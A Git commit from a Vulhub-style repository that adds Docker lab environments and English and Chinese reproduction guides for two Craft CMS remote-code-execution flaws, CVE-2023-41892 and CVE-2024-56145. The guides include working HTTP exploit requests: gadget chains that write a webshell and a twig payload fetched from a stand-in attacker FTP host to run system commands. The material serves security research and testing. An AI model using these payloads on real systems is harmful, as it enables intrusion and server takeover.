aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details

Browse Source
This commit is contained in:
Aaron
2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

BIN
craftcms/CVE-2023-41892/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
craftcms/CVE-2023-41892/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 49 KiB

BIN
craftcms/CVE-2023-41892/3.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 74 KiB

BIN
craftcms/CVE-2023-41892/4.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 35 KiB

BIN
craftcms/CVE-2023-41892/5.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 45 KiB

126
craftcms/CVE-2023-41892/README.md Normal file
View File

@@ -0,0 +1,126 @@
# CraftCMS ConditionsController Pre-Auth Remote Code Execution (CVE-2023-41892)
[中文版本(Chinese version)](README.zh-cn.md)
Craft CMS is a flexible, user-friendly CMS for creating custom digital experiences on the web. It provides users with a backend interface to implement websites and configure the CMS.
A vulnerability in Craft CMS versions 4.4.0 through 4.4.14 allows unauthenticated attackers to achieve remote code execution through the `ConditionsController`. The vulnerability exists due to insufficient input validation in the controller's `beforeAction` method, which can be exploited to create arbitrary objects and achieve code execution.
References:
- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
- <https://blog.calif.io/p/craftcms-rce>
- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
## Environment Setup
Execute the following command to start a vulnerable Craft CMS 4.4.14:
```
docker compose up -d
```
After the server is running, you can see the installation page at `http://your-ip:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
![](1.png)
## Vulnerability Reproduction
The root cause of the vulnerability is that the attacker can send a specially crafted HTTP request to create arbitrary objects through PHP object injection. By chaining multiple gadgets in the codebase, the attacker can achieve remote code execution.
There are two common gadgets that can be used to achieve remote code execution.
### Gadget 1: `craft\elements\conditions\users\UserCondition` with `\Psy\Configuration`
This gadget requires server logging to be enabled, which is enabled by default.
First, send a POST request with a syntax error JSON to write the payload to the log file:
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa
<?php
@phpinfo(); __halt_compiler();
?>
}
```
![](2.png)
Then, trigger the remote code execution by including the log file through the `\Psy\Configuration` gadget (replace the `2025-03-31` with your current date):
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
"config": {
"name": "test",
"as xyz": {
"class": "\\Psy\\Configuration",
"__construct()": {
"config": {
"configFile": "../storage/logs/web-2025-03-31.log"
}
}
}
},
"test": "craft\\elements\\conditions\\users\\UserCondition"
}
```
![](3.png)
As you can see, the PHPINFO is executed successfully.
### Gadget 2: `craft\elements\conditions\users\UserCondition` with built-in `Imagick` class
If the Imagick extension is enabled, you can use the `Imagick` class with MSL format to write arbitrary files:
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="test"
craft\elements\conditions\users\UserCondition
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[name]"
test
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][class]"
imagick
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
vid:msl:/tmp/php*
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="file"; filename="1.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?=phpinfo();?&gt;"/>
<write filename="info:webshell.php" />
</image>
------WebKitFormBoundarytlNPtAxuuGOeUqqY--
```
This payload will execute PHP code like `new Imagick('vid:msl:/tmp/php*');`, and cause the "Segmentation fault" error, which makes the thread crash:
![](4.png)
But the `webshell.php` file is written successfully:
![](5.png)

124
craftcms/CVE-2023-41892/README.zh-cn.md Normal file
View File

@@ -0,0 +1,124 @@
# CraftCMS未授权远程代码执行漏洞CVE-2023-41892
Craft CMS是一个灵活、用户友好的内容管理系统用于在Web上创建自定义的数字体验。它为用户提供了一个后端界面来实现网站并配置CMS。
Craft CMS 4.4.0至4.4.14版本中存在一个远程代码执行漏洞。未经身份验证的攻击者可以通过`ConditionsController`实现远程代码执行。该漏洞存在于控制器的`beforeAction`方法中,由于输入验证不足,攻击者可以利用该漏洞创建任意对象并实现代码执行。
参考链接:
- <https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g>
- <https://blog.calif.io/p/craftcms-rce>
- <https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/>
## 环境搭建
执行如下命令启动一个存在漏洞的Craft CMS 4.4.14环境:
```
docker compose up -d
```
环境启动后,访问`http://your-ip:8088/admin/install`即可看到CraftCMS的安装页面。请按照页面提示完成安装默认数据库地址为`db`,用户名和密码均为`root`
![](1.png)
## 漏洞复现
漏洞的根本原因是攻击者可以通过PHP对象注入发送特制的HTTP请求来创建任意对象。通过链接代码库中的多个gadget攻击者可以实现远程代码执行。
有两种常用的gadget组合可以实现远程代码执行。
### Gadget 1使用`craft\elements\conditions\users\UserCondition`和`\Psy\Configuration`
这个gadget需要服务器开启日志记录功能该功能默认是开启的。
首先发送一个包含语法错误的JSON的POST请求将payload写入日志文件
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
aaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaa
<?php
@phpinfo(); __halt_compiler();
?>
}
```
![](2.png)
然后,通过`\Psy\Configuration` gadget包含日志文件来触发远程代码执行请将`2025-03-31`替换为当前日期):
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: application/json
{
"config": {
"name": "test",
"as xyz": {
"class": "\\Psy\\Configuration",
"__construct()": {
"config": {
"configFile": "../storage/logs/web-2025-03-31.log"
}
}
}
},
"test": "craft\\elements\\conditions\\users\\UserCondition"
}
```
![](3.png)
如图所示PHPINFO成功执行。
### Gadget 2使用`craft\elements\conditions\users\UserCondition`和内置的`Imagick`类
如果服务器启用了Imagick扩展可以使用`Imagick`类的MSL格式来写入任意文件
```
POST /index.php?action=conditions/render HTTP/1.1
Host: localhost:8088
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytlNPtAxuuGOeUqqY
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="test"
craft\elements\conditions\users\UserCondition
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[name]"
test
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][class]"
imagick
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="config[as xyz][__construct()][0][0]"
vid:msl:/tmp/php*
------WebKitFormBoundarytlNPtAxuuGOeUqqY
Content-Disposition: form-data; name="file"; filename="1.msl"
Content-Type: text/plain
<?xml version="1.0" encoding="UTF-8"?>
<image>
<read filename="caption:&lt;?=phpinfo();?&gt;"/>
<write filename="info:webshell.php" />
</image>
------WebKitFormBoundarytlNPtAxuuGOeUqqY--
```
这个payload会执行类似`new Imagick('vid:msl:/tmp/php*');`的PHP代码并导致"Segmentation fault"错误,使线程崩溃:
![](4.png)
但是`webshell.php`文件已经成功写入:
![](5.png)

12
craftcms/CVE-2023-41892/docker-compose.yml Normal file
View File

@@ -0,0 +1,12 @@
services:
web:
image: vulhub/craftcms:4.4.14
depends_on:
- db
ports:
- "8088:80"
db:
image: mysql:5.7
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=craftcms

BIN
craftcms/CVE-2024-56145/1.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
craftcms/CVE-2024-56145/2.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 45 KiB

52
craftcms/CVE-2024-56145/README.md Normal file
View File

@@ -0,0 +1,52 @@
# CraftCMS `register_argc_argv` Leads to Remote Code Execution (CVE-2024-56145)
[中文版本(Chinese version)](README.zh-cn.md)
CraftCMS is a PHP-based content management system for building websites and applications.
CraftCMS version before 5.5.2 and 4.13.2 is vulnerable to remote code execution if the PHP setting `register_argc_argv` is enabled. When `register_argc_argv` is enabled, CraftCMS incorrectly reads configuration items from the HTTP request, allowing an attacker to control template files using the `--templatesPath`, which can lead to arbitrary code execution through template injection.
Reference:
- <https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9>
- <https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms>
## Vulnerable Environment
Execute the following command to start a CraftCMS server 5.5.1.1:
```
docker-compose up -d
```
After the server is running, you can see the installation page at `http://<your-ip>:8088/admin/install`. Please follow the instructions to install CraftCMS, the default database address is `db` and the username and password are both `root`.
![](1.png)
## Vulnerability Reproduction
To reproduce the vulnerability, you need to prepare a craft `index.twig` file which contains the following content, then place it on any remote server:
```twig
{{ ['system', 'id'] | sort('call_user_func') | join('') }}
```
Then start a FTP server in the server where the `index.twig` file is located:
```bash
# install pyftpdlib
pip install pyftpdlib
# start a FTP server
python -m pyftpdlib -p 21212 -V
```
Then you can exploit the vulnerability by sending the following request:
```
http://<your-ip>:8088/?--templatesPath=ftp://<evil-ip>:21212/
```
![](2.png)
As you can see, the `id` command is executed and the output is returned.

50
craftcms/CVE-2024-56145/README.zh-cn.md Normal file
View File

@@ -0,0 +1,50 @@
# CraftCMS `register_argc_argv` 导致远程代码执行漏洞CVE-2024-56145
CraftCMS 是一个基于 PHP 的内容管理系统,用于构建网站和应用程序。
CraftCMS 5.5.2 和 4.13.2 之前的版本存在潜在的远程代码执行漏洞。当 PHP 环境启用 `register_argc_argv`CraftCMS 会错误地从 HTTP 请求中读取配置项,攻击者可以使用 `--templatesPath` 控制模板文件,并利用模板注入导致任意代码执行。
参考链接:
- <https://github.com/craftcms/cms/security/advisories/GHSA-2p6p-9rc9-62j9>
- <https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms>
## 漏洞环境
执行以下命令启动一个 CraftCMS 5.5.1.1 服务器:
```
docker-compose up -d
```
服务器启动后,你可以在 `http://<your-ip>:8088/admin/install` 看到安装页面。请按照说明安装 CraftCMS默认数据库地址为 `db`,用户名和密码均为 `root`
![](1.png)
## 漏洞复现
要复现该漏洞,你需要准备一个包含以下内容的 `index.twig` 文件并放置在任意远程服务器上:
```twig
{{ ['system', 'id'] | sort('call_user_func') | join('') }}
```
然后在 `index.twig` 文件所在的服务器中启动一个 FTP 服务器:
```bash
# 安装 pyftpdlib
pip install pyftpdlib
# 启动 FTP 服务器
python -m pyftpdlib -p 21212 -V
```
然后你可以通过发送以下请求来利用该漏洞:
```
http://<your-ip>:8088/?--templatesPath=ftp://<evil-ip>:21212/
```
![](2.png)
如你所见,`id` 命令被成功执行并返回了结果。

12
craftcms/CVE-2024-56145/docker-compose.yml Normal file
View File

@@ -0,0 +1,12 @@
services:
web:
image: vulhub/craftcms:5.5.1.1
depends_on:
- db
ports:
- "8088:80"
db:
image: mysql:8.4
environment:
- MYSQL_ROOT_PASSWORD=root
- MYSQL_DATABASE=craftcms

1
craftcms/CVE-2024-56145/index.twig Normal file
View File

@@ -0,0 +1 @@
{{ ['system', 'id'] | sort('call_user_func') | join('') }}